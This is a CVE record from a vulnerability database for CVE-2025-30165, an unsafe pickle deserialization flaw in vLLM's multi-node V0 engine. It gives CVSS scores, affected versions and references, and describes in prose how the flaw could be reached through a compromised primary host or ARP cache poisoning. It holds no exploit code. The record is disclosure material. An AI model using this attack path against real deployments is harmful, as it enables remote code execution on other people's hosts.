cve-2025-30165
Vulnerability from cvelistv5
Published
2025-05-06 16:53
Modified
2025-05-06 17:26
Summary
Remote Code Execution Vulnerability in vLLM Multi-Node Cluster Configuration
Impacted products
vllm-projectvllm
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-30165",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-05-06T17:22:47.717996Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-05-06T17:26:58.974Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "vllm",
          "vendor": "vllm-project",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 0.5.2, \u003c= 0.8.5.post1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "vLLM is an inference and serving engine for large language models. In a multi-node vLLM deployment using the V0 engine, vLLM uses ZeroMQ for some multi-node communication purposes. The secondary vLLM hosts open a `SUB` ZeroMQ socket and connect to an `XPUB` socket on the primary vLLM host. When data is received on this `SUB` socket, it is deserialized with `pickle`. This is unsafe, as it can be abused to execute code on a remote machine. Since the vulnerability exists in a client that connects to the primary vLLM host, this vulnerability serves as an escalation point. If the primary vLLM host is compromised, this vulnerability could be used to compromise the rest of the hosts in the vLLM deployment. Attackers could also use other means to exploit the vulnerability without requiring access to the primary vLLM host. One example would be the use of ARP cache poisoning to redirect traffic to a malicious endpoint used to deliver a payload with arbitrary code to execute on the target machine. Note that this issue only affects the V0 engine, which has been off by default since v0.8.0. Further, the issue only applies to a deployment using tensor parallelism across multiple hosts, which we do not expect to be a common deployment pattern. Since V0 is has been off by default since v0.8.0 and the fix is fairly invasive, the maintainers of vLLM have decided not to fix this issue. Instead, the maintainers recommend that users ensure their environment is on a secure network in case this pattern is in use. The V1 engine is not affected by this issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-502",
              "description": "CWE-502: Deserialization of Untrusted Data",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-06T16:53:52.836Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/vllm-project/vllm/security/advisories/GHSA-9pcc-gvx5-r5wm",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-9pcc-gvx5-r5wm"
        },
        {
          "name": "https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L295-L301",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L295-L301"
        },
        {
          "name": "https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L468-L470",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L468-L470"
        }
      ],
      "source": {
        "advisory": "GHSA-9pcc-gvx5-r5wm",
        "discovery": "UNKNOWN"
      },
      "title": "Remote Code Execution Vulnerability in vLLM Multi-Node Cluster Configuration"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-30165",
    "datePublished": "2025-05-06T16:53:52.836Z",
    "dateReserved": "2025-03-17T12:41:42.567Z",
    "dateUpdated": "2025-05-06T17:26:58.974Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-30165\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-05-06T17:16:11.660\",\"lastModified\":\"2025-05-07T14:13:20.483\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"vLLM is an inference and serving engine for large language models. In a multi-node vLLM deployment using the V0 engine, vLLM uses ZeroMQ for some multi-node communication purposes. The secondary vLLM hosts open a `SUB` ZeroMQ socket and connect to an `XPUB` socket on the primary vLLM host. When data is received on this `SUB` socket, it is deserialized with `pickle`. This is unsafe, as it can be abused to execute code on a remote machine. Since the vulnerability exists in a client that connects to the primary vLLM host, this vulnerability serves as an escalation point. If the primary vLLM host is compromised, this vulnerability could be used to compromise the rest of the hosts in the vLLM deployment. Attackers could also use other means to exploit the vulnerability without requiring access to the primary vLLM host. One example would be the use of ARP cache poisoning to redirect traffic to a malicious endpoint used to deliver a payload with arbitrary code to execute on the target machine. Note that this issue only affects the V0 engine, which has been off by default since v0.8.0. Further, the issue only applies to a deployment using tensor parallelism across multiple hosts, which we do not expect to be a common deployment pattern. Since V0 is has been off by default since v0.8.0 and the fix is fairly invasive, the maintainers of vLLM have decided not to fix this issue. Instead, the maintainers recommend that users ensure their environment is on a secure network in case this pattern is in use. The V1 engine is not affected by this issue.\"},{\"lang\":\"es\",\"value\":\"vLLM es un motor de inferencia y servicio para modelos de lenguaje extensos. En una implementaci\u00f3n de vLLM multinodo con el motor V0, vLLM utiliza ZeroMQ para la comunicaci\u00f3n multinodo. Los hosts secundarios de vLLM abren un socket \\\"SUB\\\" de ZeroMQ y se conectan a un socket \\\"XPUB\\\" en el host principal de vLLM. Cuando se reciben datos en este socket \\\"SUB\\\", se deserializan con \\\"pickle\\\". Esto es peligroso, ya que puede utilizarse para ejecutar c\u00f3digo en una m\u00e1quina remota. Dado que la vulnerabilidad existe en un cliente que se conecta al host principal de vLLM, sirve como punto de escalada. Si el host principal de vLLM se ve comprometido, esta vulnerabilidad podr\u00eda utilizarse para comprometer el resto de los hosts de la implementaci\u00f3n de vLLM. Los atacantes tambi\u00e9n podr\u00edan utilizar otros medios para explotar la vulnerabilidad sin necesidad de acceder al host principal de vLLM. Un ejemplo ser\u00eda el uso de envenenamiento de cach\u00e9 ARP para redirigir el tr\u00e1fico a un endpoint malicioso utilizado para entregar un payload con c\u00f3digo arbitrario que se ejecuta en la m\u00e1quina objetivo. Tenga en cuenta que este problema solo afecta al motor V0, que ha estado desactivado por defecto desde la versi\u00f3n v0.8.0. Adem\u00e1s, el problema solo se aplica a implementaciones que utilizan paralelismo tensorial en varios hosts, lo cual no esperamos que sea un patr\u00f3n de implementaci\u00f3n com\u00fan. Dado que V0 ha estado desactivado por defecto desde la versi\u00f3n v0.8.0 y la soluci\u00f3n es bastante invasiva, los responsables de vLLM han decidido no corregir este problema. En su lugar, recomiendan a los usuarios que se aseguren de que su entorno est\u00e9 en una red segura en caso de que se utilice este patr\u00f3n. El motor V1 no se ve afectado por este problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.0,\"baseSeverity\":\"HIGH\",\"attackVector\":\"ADJACENT_NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.1,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-502\"}]}],\"references\":[{\"url\":\"https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L295-L301\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L468-L470\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/vllm-project/vllm/security/advisories/GHSA-9pcc-gvx5-r5wm\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading...

Loading...

Loading...
  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.